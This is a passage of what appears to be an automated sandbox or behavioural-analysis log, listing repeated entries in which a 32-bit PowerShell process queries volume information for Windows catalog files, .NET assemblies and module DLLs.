                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
